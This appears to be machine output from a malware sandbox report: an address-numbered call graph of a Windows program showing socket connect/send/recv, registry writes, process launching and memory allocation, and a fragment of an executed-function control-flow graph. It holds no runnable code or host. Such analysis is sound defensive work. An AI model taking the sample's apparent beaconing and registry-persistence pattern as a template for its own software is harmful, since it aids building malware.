20986 426260 29 API calls 20985->20986 20986->20987 20988 426504 63 API calls 20987->20988 20990 425db5 ___scrt_fastfail 20988->20990 20992 410c91 51 API calls 20990->20992 20997 425e1b 20990->20997 20994 425ddf 20992->20994 20995 426217 3 API calls 20994->20995 20996 425dfd 20995->20996 20996->20997 20998 401b1e 27 API calls 20996->20998 21186 4019f8 26 API calls 20997->21186 20999 425e16 20998->20999 21000 426260 29 API calls 20999->21000 21000->20997 21638 4138ce 21001->21638 21004->20889 21005->20893 21006->20894 21010->20883 21012->20912 21013->20914 21014->20916 21015->20919 21017 40b5b7 21016->21017 21017->20922 21017->21017 21019 41e1ca 21018->21019 21021 41e1d3 21018->21021 21023 41e0c0 51 API calls 4 library calls 21019->21023 21021->20927 21022->20927 21023->21021 21188 402c50 21024->21188 21028 4034c0 21027->21028 21029 4034d9 21027->21029 21028->21029 21197 40e509 46 API calls 21028->21197 21031 401b52 21029->21031 21198 402d13 21031->21198 21033 401b68 21033->20937 21035 42635e __EH_prolog 21034->21035 21229 403e0c 21035->21229 21037 426382 21037->21037 21038 402c71 27 API calls 21037->21038 21039 4263e7 21038->21039 21243 404097 21039->21243 21041 426496 21044 4264b2 std::ios_base::_Ios_base_dtor 21041->21044 21260 40387f 26 API calls _Deallocate 21041->21260 21256 402bef 21044->21256 21045 402c71 27 API calls 21048 42646e 21045->21048 21047 402c50 27 API calls 21050 42648e 21047->21050 21048->21047 21052 402bef 26 API calls 21050->21052 21051 402bef 26 API calls 21053 424be8 21051->21053 21052->21041 21053->20941 21055 425eec __EH_prolog 21054->21055 21390 401bb2 21055->21390 21060 425f4b 21406 401a16 21060->21406 21061 425f2f 21427 401b6f 21061->21427 21064 425f58 21409 4024a1 21064->21409 21067 425f42 std::ios_base::_Ios_base_dtor 21067->20946 21071 425fa6 21072 401b6f 68 API calls 21071->21072 21072->21067 21074 4034ed __EH_prolog 21073->21074 21578 401056 21074->21578 21076 403513 21077 401056 50 API calls 21076->21077 21078 403542 21077->21078 21582 40399f 21078->21582 21080 403553 21080->20950 21082 42650e __EH_prolog 21081->21082 21083 401b1e 27 API calls 21082->21083 21084 4268d7 21083->21084 21620 401aa1 21084->21620 21086 4268ed 21087 401aa1 27 API calls 21086->21087 21088 426974 21087->21088 21089 401aa1 27 API calls 21088->21089 21090 426981 21089->21090 21091 401aa1 27 API calls 21090->21091 21092 4269e4 21091->21092 21093 401aa1 27 API calls 21092->21093 21094 4269f5 21093->21094 21095 401aa1 27 API calls 21094->21095 21096 426a02 21095->21096 21097 401aa1 27 API calls 21096->21097 21098 426aad 21097->21098 21099 401aa1 27 API calls 21098->21099 21100 426da4 21099->21100 21101 401aa1 27 API calls 21100->21101 21102 427053 21101->21102 21103 401aa1 27 API calls 21102->21103 21129 427060 21103->21129 21104 42717c 21105 401aa1 27 API calls 21104->21105 21106 427189 WSAStartup 21105->21106 21107 4271a3 socket 21106->21107 21130 4273da 21106->21130 21108 4271d0 21107->21108 21109 4271bb 21107->21109 21111 4271d8 gethostbyname 21108->21111 21110 4271c4 WSACleanup 21109->21110 21113 42758b 21110->21113 21114 4271e9 ctype 21111->21114 21111->21130 21112 42757e WSACleanup closesocket 21112->21113 21113->20952 21115 4271fc htons connect 21114->21115 21116 42722b 21115->21116 21115->21130 21117 42723d send 21116->21117 21118 42724d 21117->21118 21117->21130 21119 427253 send 21118->21119 21124 427269 ___scrt_fastfail 21118->21124 21119->21124 21119->21130 21120 42728f recv 21120->21124 21120->21130 21121 4273cd 21122 4273d4 21121->21122 21123 427515 21121->21123 21142 4273e9 21121->21142 21122->21130 21122->21142 21126 427535 recv 21123->21126 21123->21130 21124->21120 21124->21121 21127 412faf 46 API calls 21124->21127 21124->21130 21626 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 21124->21626 21125 42740d recv 21125->21130 21125->21142 21126->21123 21126->21130 21127->21124 21129->21104 21132 401aa1 27 API calls 21129->21132 21130->21112 21131 427508 21131->21130 21133 42714c 21132->21133 21624 403ae1 27 API calls 21133->21624 21136 427157 21625 401ac2 27 API calls 21136->21625 21138 427164 21139 401aa1 27 API calls 21138->21139 21139->21104 21141 4274aa recv 21141->21130 21141->21142 21142->21125 21142->21130 21142->21131 21142->21141 21143 4274d5 recv 21142->21143 21627 41196d 42 API calls std::_Locinfo::_Locinfo_dtor 21142->21627 21628 42611d 22 API calls 21142->21628 21143->21130 21143->21142 21634 4275a4 21144->21634 21146 426139 RegCreateKeyExA 21147 4261f7 21146->21147 21150 42616c 21146->21150 21148 426206 21147->21148 21149 4261fd RegCloseKey 21147->21149 21148->20954 21149->21148 21151 402c71 27 API calls 21150->21151 21152 426195 21151->21152 21153 402c71 27 API calls 21152->21153 21154 4261be RegSetValueExA 21153->21154 21155 402bef 26 API calls 21154->21155 21156 4261ef 21155->21156 21157 402bef 26 API calls 21156->21157 21157->21147 21159 403579 __EH_prolog 21158->21159 21160 401056 50 API calls 21159->21160 21161 40359c 21160->21161 21162 401056 50 API calls 21161->21162 21163 4035c8 21162->21163 21164 40399f 27 API calls 21163->21164 21165 4035d9 21164->21165 21165->20958 21167 410cb2 21166->21167 21168 410c9d 21166->21168 21637 41097b 51 API calls 5 library calls 21167->21637 21635 412381 20 API calls __dosmaperr 21168->21635 21171 410ca2 21636 410905 26 API calls _Deallocate 21171->21636 21172 410cad 21172->20969 21175 42588e 21174->21175 21176 42623e WriteFile FindCloseChangeNotification 21174->21176 21175->20973 21175->20977 21176->21175 21178 426271 21177->21178 21178->21178 21179 426279 ShellExecuteExA 21178->21179 21180 4262c5 21179->21180 21181 4262ae WaitForSingleObject CloseHandle 21179->21181 21182 402bef 26 API calls 21180->21182 21181->21180 21183 4262cd 21182->21183 21183->20977 21185 425b8e 21184->21185 21185->20982 21189 402c5a 21188->21189 21189->21189 21192 402c71 21189->21192 21191 401b3a 21191->20932 21193 402ca4 21192->21193 21195 402c80 BuildCatchObjectHelperInternal 21192->21195 21196 40373e 27 API calls 2 library calls 21193->21196 21195->21191 21196->21195 21197->21028 21199 402d2a 21198->21199 21201 402d31 ctype 21199->21201 21202 403859 21199->21202 21201->21033 21203 403866 21202->21203 21204 40386f 21202->21204 21209 4039ce 21203->21209 21206 40387b 21204->21206 21218 409256 21204->21218 21206->21201 21207 40386c 21207->21201 21210 409256 std::_Facet_Register 8 API calls 21209->21210 21211 4039e5 21210->21211 21212 4039ec 21211->21212 21213 4039f7 21211->21213 21212->21207 21225 41088a 26 API calls 4 library calls 21213->21225 21215 410924 21226 410932 11 API calls _Atexit 21215->21226 21217 410931 21220 40925b ___crtLCMapStringA 21218->21220 21219 409275 21219->21207 21220->21219 21222 409277 std::_Facet_Register 21220->21222 21227 412ede 7 API calls 2 library calls 21220->21227 21228 40aa2b RaiseException 21222->21228 21224 40996c 21225->21215 21226->21217 21227->21220 21228->21224 21230 403e16 __EH_prolog 21229->21230 21261 407d73 21230->21261 21232 403e38 21271 404189 21232->21271 21238 403e7f 21309 4044e5 21238->21309 21240 403e8b 21330 4043fe 21240->21330 21244 4040a1 __EH_prolog 21243->21244 21245 4040b2 21244->21245 21383 40429b 27 API calls __EH_prolog 21244->21383 21245->21041 21245->21045 21245->21048 21247 4040d9 21384 404777 27 API calls 21247->21384 21251 4040e9 21252 404144 21251->21252 21255 404152 21251->21255 21385 404777 27 API calls 21251->21385 21386 404579 26 API calls 21251->21386 21387 404777 27 API calls 21252->21387 21388 404238 26 API calls _Deallocate 21255->21388 21257 402bfa 21256->21257 21259 402c03 21256->21259 21389 40387f 26 API calls _Deallocate 21257->21389 21259->21051 21260->21044 21262 407d7f __EH_prolog3 21261->21262 21334 407b1c 21262->21334 21267 407d9d 21348 407f02 40 API calls _Atexit 21267->21348 21268 407dfb std::locale::_Locimp::_Locimp_dtor 21268->21232 21270 407da5 _Yarn 21340 407b74 21270->21340 21272 404193 __EH_prolog 21271->21272 21273 407b1c std::_Lockit::_Lockit 2 API calls 21272->21273 21274 4041a2 21273->21274 21353 401318 21274->21353 21276 4041b9 std::locale::_Getfacet 21278 4041cc 21276->21278 21359 40436e 76 API calls 3 library calls 21276->21359 21277 407b74 std::_Lockit::~_Lockit 2 API calls 21279 403e49 21277->21279 21278->21277 21287 4033ea 21279->21287 21281 4041dc 21282 4041e3 21281->21282 21283 404219 21281->21283 21360 407d41 8 API calls std::_Facet_Register 21282->21360 21361 40aa2b RaiseException 21283->21361 21286 40422f 21288 4033f4 __EH_prolog 21287->21288 21289 407b1c std::_Lockit::_Lockit 2 API calls 21288->21289 21290 403403 21289->21290 21291 401318 int 4 API calls 21290->21291 21292 40341a std::locale::_Getfacet 21291->21292 21294 40342d 21292->21294 21362 401429 76 API calls 2 library calls 21292->21362 21293 407b74 std::_Lockit::~_Lockit 2 API calls 21295 40346a 21293->21295 21294->21293 21303 404424 21295->21303 21297 40343d 21298 403444 21297->21298 21299 40347a 21297->21299 21363 407d41 8 API calls std::_Facet_Register 21298->21363 21364 40aa2b RaiseException 21299->21364 21302 403490 21304 40442e __EH_prolog 21303->21304 21365 404d6b 21304->21365 21306 404463 21307 409256 std::_Facet_Register 8 API calls 21306->21307 21308 40447e 21307->21308 21308->21238 21310 4044ef __EH_prolog 21309->21310 21377 405177 8 API calls std::_Facet_Register 21310->21377 21312 40450d 21378 405025 29 API calls std::_Facet_Register 21312->21378 21314 404517 21315 404571 21314->21315 21316 40451e 21314->21316 21381 404efe 27 API calls 21315->21381 21379 405119 8 API calls std::_Facet_Register 21316->21379 21319 404528 21380 405e85 8 API calls std::_Facet_Register 21319->21380 21321 404531 21321->21240 21331 403eb8 21330->21331 21332 404406 21330->21332 21331->21037 21382 40387f 26 API calls _Deallocate 21332->21382 21335 407b32 21334->21335 21336 407b2b 21334->21336 21338 407b30 21335->21338 21350 408745 EnterCriticalSection 21335->21350 21349 411a65 EnterCriticalSection _Atexit 21336->21349 21338->21270 21347 407edf 8 API calls 2 library calls 21338->21347 21341 407b7e 21340->21341 21342 411a6e 21340->21342 21343 407b91 21341->21343 21351 408753 LeaveCriticalSection 21341->21351 21352 411a4e LeaveCriticalSection 21342->21352 21343->21268 21346 411a75 21346->21268 21347->21267 21348->21270 21349->21338 21350->21338 21351->21343 21352->21346 21354 401324 21353->21354 21355 401348 21353->21355 21356 407b1c std::_Lockit::_Lockit 2 API calls 21354->21356 21355->21276 21357 40132e 21356->21357 21358 407b74 std::_Lockit::~_Lockit 2 API calls 21357->21358 21358->21355 21359->21281 21360->21278 21361->21286 21362->21297 21363->21294 21364->21302 21368 404eb6 21365->21368 21367 404d85 21367->21306 21367->21367 21369 404ed2 21368->21369 21370 404ece 21368->21370 21371 404ef8 21369->21371 21372 404eda 21369->21372 21370->21367 21376 4030f6 27 API calls 21371->21376 21373 403859 27 API calls 21372->21373 21373->21370 21377->21312 21378->21314 21379->21319 21380->21321 21382->21331 21383->21247 21384->21251 21385->21251 21386->21251 21387->21255 21389->21259 21391 401bbc __EH_prolog 21390->21391 21431 40307c 21391->21431 21397 401c1f 21398 401c51 21397->21398 21449 40187f 43 API calls 2 library calls 21397->21449 21400 402403 21398->21400 21401 40240d __EH_prolog 21400->21401 21467 402b06 21401->21467 21404 402441 21404->21060 21404->21061 21513 402baa 21406->21513 21408 401a30 ___scrt_fastfail 21408->21064 21411 4024ab __EH_prolog 21409->21411 21410 4024e4 21413 402b06 43 API calls 21410->21413 21411->21410 21522 40187f 43 API calls 2 library calls 21411->21522 21414 4024ee 21413->21414 21415 402551 21414->21415 21418 401d87 65 API calls 21414->21418 21419 40257c 21415->21419 21416 402511 21416->21415 21523 40187f 43 API calls 2 library calls 21416->21523 21418->21416 21420 402586 __EH_prolog 21419->21420 21421 402b06 43 API calls 21420->21421 21423 4025a8 21421->21423 21422 40265a 21430 402b87 26 API calls _Deallocate 21422->21430 21425 4025d8 21423->21425 21524 401f2b 21423->21524 21425->21422 21528 40187f 43 API calls 2 library calls 21425->21528 21566 4023b6 21427->21566 21429 401b95 21429->21067 21430->21071 21432 403086 __EH_prolog 21431->21432 21450 403175 21432->21450 21435 402fe5 21436 402fef __EH_prolog 21435->21436 21437 409256 std::_Facet_Register 8 API calls 21436->21437 21438 403005 21437->21438 21439 407d73 std::locale::_Init 43 API calls 21438->21439 21440 403013 21439->21440 21461 402e7b 21440->21461 21443 402f6b 21444 402f75 __EH_prolog 21443->21444 21445 402fbf std::ios_base::_Ios_base_dtor 21444->21445 21446 402e7b 26 API calls 21444->21446 21445->21397 21447 402f9d 21446->21447 21466 4035f5 76 API calls 7 library calls 21447->21466 21449->21398 21451 40317f __EH_prolog 21450->21451 21452 409256 std::_Facet_Register 8 API calls 21451->21452 21453 4031b9 21452->21453 21454 407d73 std::locale::_Init 43 API calls 21453->21454 21455 4031c6 21454->21455 21456 4033ea 76 API calls 21455->21456 21458 4031f5 std::ios_base::_Ios_base_dtor 21456->21458 21457 401bec 21457->21435 21458->21457 21460 40187f 43 API calls 2 library calls 21458->21460 21460->21457 21462 401c0f 21461->21462 21463 402ed9 21461->21463 21462->21443 21465 40e7d7 26 API calls 2 library calls 21463->21465 21465->21462 21466->21445 21468 402b10 __EH_prolog 21467->21468 21479 403101 21468->21479 21471 401d87 21472 401d99 21471->21472 21478 401df4 21472->21478 21487 402dfd 21472->21487 21475 401de1 21475->21478 21496 40fd67 21475->21496 21478->21404 21482 40310b __EH_prolog 21479->21482 21480 403128 21481 40241d 21480->21481 21486 40187f 43 API calls 2 library calls 21480->21486 21481->21404 21481->21471 21482->21480 21485 403242 43 API calls __EH_prolog 21482->21485 21485->21480 21486->21481 21488 402e0d 21487->21488 21489 401dc4 21487->21489 21488->21489 21507 4022ae 65 API calls 21488->21507 21489->21475 21489->21478 21493 4106d4 21489->21493 21491 402e1a 21491->21489 21508 40ea7d 65 API calls 2 library calls 21491->21508 21494 41049b _Xfiopen 64 API calls 21493->21494 21495 4106ea 21494->21495 21495->21475 21497 40fd72 21496->21497 21498 40fd87 21496->21498 21509 412381 20 API calls __dosmaperr 21497->21509 21500 40fd9f 21498->21500 21511 412381 20 API calls __dosmaperr 21498->21511 21500->21478 21501 40fd77 21510 410905 26 API calls _Deallocate 21501->21510 21503 40fd94 21512 410905 26 API calls _Deallocate 21503->21512 21506 40fd82 21506->21478 21507->21491 21508->21489 21509->21501 21510->21506 21511->21503 21512->21500 21514 402bc2 21513->21514 21515 402bc6 21513->21515 21514->21408 21516 402be9 21515->21516 21517 402bce 21515->21517 21521 4030f6 27 API calls 21516->21521 21518 403859 27 API calls 21517->21518 21518->21514 21522->21410 21523->21415 21525 401f52 ctype 21524->21525 21527 401f3f 21524->21527 21525->21527 21529 4102e9 21525->21529 21527->21425 21528->21422 21532 410306 21529->21532 21531 410301 21531->21527 21533 410312 CallCatchBlock 21532->21533 21534 410352 21533->21534 21535 41034a _Xfiopen 21533->21535 21537 410325 ___scrt_fastfail 21533->21537 21545 40e81d EnterCriticalSection 21534->21545 21535->21531 21559 412381 20 API calls __dosmaperr 21537->21559 21539 41035c 21546 41011d 21539->21546 21540 41033f 21560 410905 26 API calls _Deallocate 21540->21560 21545->21539 21548 41012f ___scrt_fastfail 21546->21548 21552 41014c 21546->21552 21547 41013c 21562 412381 20 API calls __dosmaperr 21547->21562 21548->21547 21548->21552 21555 41018f __fread_nolock 21548->21555 21550 410141 21563 410905 26 API calls _Deallocate 21550->21563 21561 410391 LeaveCriticalSection _Xfiopen 21552->21561 21553 4102ab ___scrt_fastfail 21565 412381 20 API calls __dosmaperr 21553->21565 21555->21552 21555->21553 21556 4154e8 _Xfiopen 26 API calls 21555->21556 21558 4192ad __fread_nolock 38 API calls 21555->21558 21564 410399 26 API calls 4 library calls 21555->21564 21556->21555 21558->21555 21559->21540 21560->21535 21561->21535 21562->21550 21563->21552 21564->21555 21565->21550 21567 4023dd 21566->21567 21568 4023ef 21567->21568 21570 402f2f 21567->21570 21568->21429 21571 402f3d 21570->21571 21577 402f39 21570->21577 21572 402dfd 65 API calls 21571->21572 21573 402f42 21572->21573 21575 40e228 _Xfiopen 67 API calls 21573->21575 21574 402e7b 26 API calls 21576 402f66 21574->21576 21575->21577 21576->21568 21577->21574 21579 40106d ___scrt_initialize_default_local_stdio_options 21578->21579 21586 40fd43 21579->21586 21583 4039c7 21582->21583 21584 4039bb 21582->21584 21583->21080 21585 402c71 27 API calls 21584->21585 21585->21583 21589 40ead5 21586->21589 21590 40eb15 21589->21590 21591 40eafd 21589->21591 21590->21591 21593 40eb1d 21590->21593 21613 412381 20 API calls __dosmaperr 21591->21613 21615 40e3f2 38 API calls 2 library calls 21593->21615 21594 40eb02 21614 410905 26 API calls _Deallocate 21594->21614 21597 40eb2d 21616 40eef9 20 API calls _free 21597->21616 21600 40eba5 21617 40f0ad 50 API calls 3 library calls 21600->21617 21601 40107b 21601->21076 21604 40eb0d 21606 4097a5 21604->21606 21605 40ebb0 21618 40ef2e 20 API calls _free 21605->21618 21607 4097b0 IsProcessorFeaturePresent 21606->21607 21608 4097ae 21606->21608 21610 409efa 21607->21610 21608->21601 21619 409ebe SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 21610->21619 21612 409fdd 21612->21601 21613->21594 21614->21604 21615->21597 21616->21600 21617->21605 21618->21604 21619->21612 21621 401aab 21620->21621 21621->21621 21629 402cba 21621->21629 21623 401abd 21623->21086 21624->21136 21625->21138 21626->21124 21627->21142 21628->21142 21630 402cfa 21629->21630 21632 402cd0 BuildCatchObjectHelperInternal 21629->21632 21633 4037a9 27 API calls 2 library calls 21630->21633 21632->21623 21633->21632 21634->21146 21635->21171 21636->21172 21637->21172 21639 4138da pair 21638->21639 21640 4138e1 21639->21640 21641 4138f3 21639->21641 21674 413a28 GetModuleHandleW 21640->21674 21662 411a06 EnterCriticalSection 21641->21662 21644 4138e6 21644->21641 21675 413a6c GetModuleHandleExW 21644->21675 21645 413998 21663 4139d8 21645->21663 21649 41396f 21654 413987 21649->21654 21684 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21649->21684 21651 4138fa 21651->21645 21651->21649 21683 4151ba 20 API calls _Atexit 21651->21683 21652 4139e1 21686 424699 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21652->21686 21653 4139b5 21666 4139e7 21653->21666 21685 41381a 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 21654->21685 21662->21651 21687 411a4e LeaveCriticalSection 21663->21687 21665 4139b1 21665->21652 21665->21653 21688 4177fa 21666->21688 21669 413a15 21671 413a6c _Atexit 8 API calls 21669->21671 21670 4139f5 GetPEB 21670->21669 21672 413a05 GetCurrentProcess TerminateProcess 21670->21672 21673 413a1d ExitProcess 21671->21673 21672->21669 21674->21644 21676 413a96 GetProcAddress 21675->21676 21677 413ab9 21675->21677 21678 413aab 21676->21678 21679 413ac8 21677->21679 21680 413abf FreeLibrary 21677->21680 21678->21677 21681 4097a5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21679->21681 21680->21679 21682 4138f2 21681->21682 21682->21641 21683->21649 21684->21654 21685->21645 21687->21665 21689 417815 21688->21689 21690 41781f 21688->21690 21692 4097a5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 21689->21692 21695 4171b7 5 API calls 2 library calls 21690->21695 21693 4139f1 21692->21693 21693->21669 21693->21670 21694 417836 21694->21689 21695->21694 21696 41aff9 21701 41adc7 21696->21701 21700 41b021 21706 41adf2 21701->21706 21703 41afe5 21720 410905 26 API calls _Deallocate 21703->21720 21705 41af44 21705->21700 21713 41a34b 21705->21713 21712 41af3b 21706->21712 21716 422ce9 46 API calls 2 library calls 21706->21716 21708 41af85 21708->21712 21717 422ce9 46 API calls 2 library calls 21708->21717 21710 41afa4 21710->21712 21718 422ce9 46 API calls 2 library calls 21710->21718 21712->21705 21719 412381 20 API calls __dosmaperr 21712->21719 21721 419d20 21713->21721 21715 41a366 21715->21700 21716->21708 21717->21710 21718->21712 21719->21703 21720->21705 21724 419d2c CallCatchBlock 21721->21724 21722 419d3a 21739 412381 20 API calls __dosmaperr 21722->21739 21724->21722 21725 419d73 21724->21725 21732 41a2fa 21725->21732 21726 419d3f 21740 410905 26 API calls _Deallocate 21726->21740 21731 419d49 _Xfiopen 21731->21715 21742 4228d8 21732->21742 21735 419d97 21741 419dc0 LeaveCriticalSection __wsopen_s 21735->21741 21738 41629a _free 20 API calls 21738->21735 21739->21726 21740->21731 21741->21731 21743 4228e4 21742->21743 21744 4228fb 21742->21744 21813 412381 20 API calls __dosmaperr 21743->21813 21746 422903 21744->21746 21747 42291a 21744->21747 21815 412381 20 API calls __dosmaperr 21746->21815 21817 4172ce 10 API calls 2 library calls 21747->21817 21749 4228e9 21814 410905 26 API calls _Deallocate 21749->21814 21751 422908 21816 410905 26 API calls _Deallocate 21751->21816 21752 422921 MultiByteToWideChar 21755 422950 21752->21755 21756 422940 GetLastError 21752->21756 21758 417a45 std::_Locinfo::_Locinfo_dtor 21 API calls 21755->21758 21818 41234b 20 API calls 2 library calls 21756->21818 21760 422958 21758->21760 21759 41a310 21759->21735 21766 41a36b 21759->21766 21761 422980 21760->21761 21762 42295f MultiByteToWideChar 21760->21762 21763 41629a _free 20 API calls 21761->21763 21762->21761 21764 422974 GetLastError 21762->21764 21763->21759 21819 41234b 20 API calls 2 library calls 21764->21819 21820 41a0ce 21766->21820 21769 41a3b6 21838 41e7d7 21769->21838 21770 41a39d 21852 41236e 20 API calls __dosmaperr 21770->21852 21773 41a3bb 21774 41a3c4 21773->21774 21775 41a3db 21773->21775 21854 41236e 20 API calls __dosmaperr 21774->21854 21851 41a039 CreateFileW 21775->21851 21779 41a3c9 21855 412381 20 API calls __dosmaperr 21779->21855 21781 41a491 GetFileType 21782 41a49c GetLastError 21781->21782 21787 41a4e3 21781->21787 21858 41234b 20 API calls 2 library calls 21782->21858 21783 41a414 21783->21781 21784 41a466 GetLastError 21783->21784 21856 41a039 CreateFileW 21783->21856 21857 41234b 20 API calls 2 library calls 21784->21857 21860 41e720 21 API calls 3 library calls 21787->21860 21788 41a3a2 21853 412381 20 API calls __dosmaperr 21788->21853 21789 41a4aa CloseHandle 21789->21788 21793 41a4d3 21789->21793 21792 41a459 21792->21781 21792->21784 21859 412381 20 API calls __dosmaperr 21793->21859 21794 41a504 21796 41a550 21794->21796 21861 41a24a 72 API calls 4 library calls 21794->21861 21801 41a57d 21796->21801 21862 419dec 72 API calls 5 library calls 21796->21862 21797 41a4d8 21797->21788 21800 41a576 21800->21801 21802 41a58e 21800->21802 21803 4163fd __wsopen_s 29 API calls 21801->21803 21804 41a338 21802->21804 21805 41a60c CloseHandle 21802->21805 21803->21804 21804->21738 21863 41a039 CreateFileW 21805->21863 21807 41a637 21808 41a641 GetLastError 21807->21808 21809 41a66d 21807->21809 21864 41234b 20 API calls 2 library calls 21808->21864 21809->21804 21811 41a64d 21865 41e8e9 21 API calls 3 library calls 21811->21865 21813->21749 21814->21759 21815->21751 21816->21759 21817->21752 21818->21759 21819->21761 21821 41a0ef 21820->21821 21823 41a109 21820->21823 21821->21823 21873 412381 20 API calls __dosmaperr 21821->21873 21866 41a05e 21823->21866 21825 41a0fe 21874 410905 26 API calls _Deallocate 21825->21874 21827 41a141 21828 41a170 21827->21828 21875 412381 20 API calls __dosmaperr 21827->21875 21835 41a1c3 21828->21835 21877 413b67 26 API calls 2 library calls 21828->21877 21831 41a1be 21833 41a23d 21831->21833 21831->21835 21832 41a165 21876 410905 26 API calls _Deallocate 21832->21876 21878 410932 11 API calls _Atexit 21833->21878 21835->21769 21835->21770 21837 41a249 21839 41e7e3 CallCatchBlock 21838->21839 21881 411a06 EnterCriticalSection 21839->21881 21841 41e7ea 21842 41e80f 21841->21842 21847 41e87d EnterCriticalSection 21841->21847 21850 41e831 21841->21850 21885 41e5b6 21 API calls 2 library calls 21842->21885 21844 41e85a _Xfiopen 21844->21773 21846 41e814 21846->21850 21886 41e6fd EnterCriticalSection 21846->21886 21848 41e88a LeaveCriticalSection 21847->21848 21847->21850 21848->21841 21882 41e8e0 21850->21882 21851->21783 21852->21788 21853->21804 21854->21779 21855->21788 21856->21792 21857->21788 21858->21789 21859->21797 21860->21794 21861->21796 21862->21800 21863->21807 21864->21811 21865->21809 21868 41a076 21866->21868 21867 41a091 21867->21827 21868->21867 21879 412381 20 API calls __dosmaperr 21868->21879 21870 41a0b5 21880 410905 26 API calls _Deallocate 21870->21880 21872 41a0c0 21872->21827 21873->21825 21874->21823 21875->21832 21876->21828 21877->21831 21878->21837 21879->21870 21880->21872 21881->21841 21887 411a4e LeaveCriticalSection 21882->21887 21884 41e8e7 21884->21844 21885->21846 21886->21850 21887->21884 21888 40cc536 21889 40cc545 21888->21889 21892 40cccd6 21889->21892 21893 40cccf1 21892->21893 21894 40cccfa CreateToolhelp32Snapshot 21893->21894 21895 40ccd16 Module32First 21893->21895 21894->21893 21894->21895 21896 40cc54e 21895->21896 21897 40ccd25 21895->21897 21899 40cc995 21897->21899 21900 40cc9c0 21899->21900 21901 40cca09 21900->21901 21902 40cc9d1 VirtualAlloc 21900->21902 21901->21901 21902->21901 21903 41870f 21904 41871b CallCatchBlock 21903->21904 21905 418727 21904->21905 21906 41873e 21904->21906 21937 412381 20 API calls __dosmaperr 21905->21937 21916 40e81d EnterCriticalSection 21906->21916 21909 41872c 21938 410905 26 API calls _Deallocate 21909->21938 21910 41874e 21917 41878b 21910->21917 21913 41875a 21939 418781 LeaveCriticalSection _Xfiopen 21913->21939 21915 418737 _Xfiopen 21916->21910 21918 4187b3 21917->21918 21919 418799 21917->21919 21920 4154e8 _Xfiopen 26 API calls 21918->21920 21943 412381 20 API calls __dosmaperr 21919->21943 21922 4187bc 21920->21922 21940 4197e5 21922->21940 21923 41879e 21944 410905 26 API calls _Deallocate 21923->21944 21927 4188c0 21929 4188cd 21927->21929 21933 418873 21927->21933 21928 418844 21930 418861 21928->21930 21928->21933 21946 412381 20 API calls __dosmaperr 21929->21946 21945 418aa4 31 API calls 3 library calls 21930->21945 21934 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21933->21934 21947 418920 30 API calls 2 library calls 21933->21947 21934->21913 21935 41886b 21935->21934 21937->21909 21938->21915 21939->21915 21948 419662 21940->21948 21942 4187d8 21942->21927 21942->21928 21942->21934 21943->21923 21944->21934 21945->21935 21946->21934 21947->21934 21949 41966e CallCatchBlock 21948->21949 21950 419676 21949->21950 21951 41968e 21949->21951 21974 41236e 20 API calls __dosmaperr 21950->21974 21953 419742 21951->21953 21958 4196c6 21951->21958 21979 41236e 20 API calls __dosmaperr 21953->21979 21954 41967b 21975 412381 20 API calls __dosmaperr 21954->21975 21957 419747 21980 412381 20 API calls __dosmaperr 21957->21980 21973 41e6fd EnterCriticalSection 21958->21973 21959 419683 _Xfiopen 21959->21942 21962 41974f 21981 410905 26 API calls _Deallocate 21962->21981 21963 4196cc 21965 4196f0 21963->21965 21966 419705 21963->21966 21976 412381 20 API calls __dosmaperr 21965->21976 21967 419767 __fread_nolock 28 API calls 21966->21967 21972 419700 21967->21972 21969 4196f5 21977 41236e 20 API calls __dosmaperr 21969->21977 21978 41973a LeaveCriticalSection __wsopen_s 21972->21978 21973->21963 21974->21954 21975->21959 21976->21969 21977->21972 21978->21959 21979->21957 21980->21962 21981->21959

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00424B3E Relevance: 53.7, APIs: 1, Strings: 29, Instructions: 1213COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 424b3e-424eb5 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 426354 call 401b1e GetModuleFileNameA call 401b1e call 425ee2 call 401a0c call 403491 * 3 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c 129 424f07-425842 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42612f call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 14 call 40197c call 403491 * 12 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 0->129 130 424eb7 0->130 499 425e40-425eb7 call 4019f8 * 2 call 401ae8 call 4019f8 call 401ae8 call 401a11 call 401ae8 * 4 129->499 500 425848-425893 call 40b5a0 call 410c91 call 4262d2 call 426217 129->500 132 424ef2-424ef7 130->132 133 424ec1-424ec6 130->133 134 424ed6-424edb 130->134 135 424ee4-424ee9 130->135 136 424eeb-424ef0 130->136 137 424ec8-424ecd 130->137 138 424ef9 130->138 139 424ebe-424ebf 130->139 140 424ecf-424ed4 130->140 141 424edd-424ee2 130->141 143 424efe-424f02 call 401adf 132->143 133->143 134->143 135->143 136->143 137->143 138->143 139->143 140->143 141->143 143->129 518 425895-4258a7 call 401b1e call 426260 500->518 519 4258af-425ac6 call 40ff7e call 403491 * 16 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 500->519 529 4258ac 518->529 613 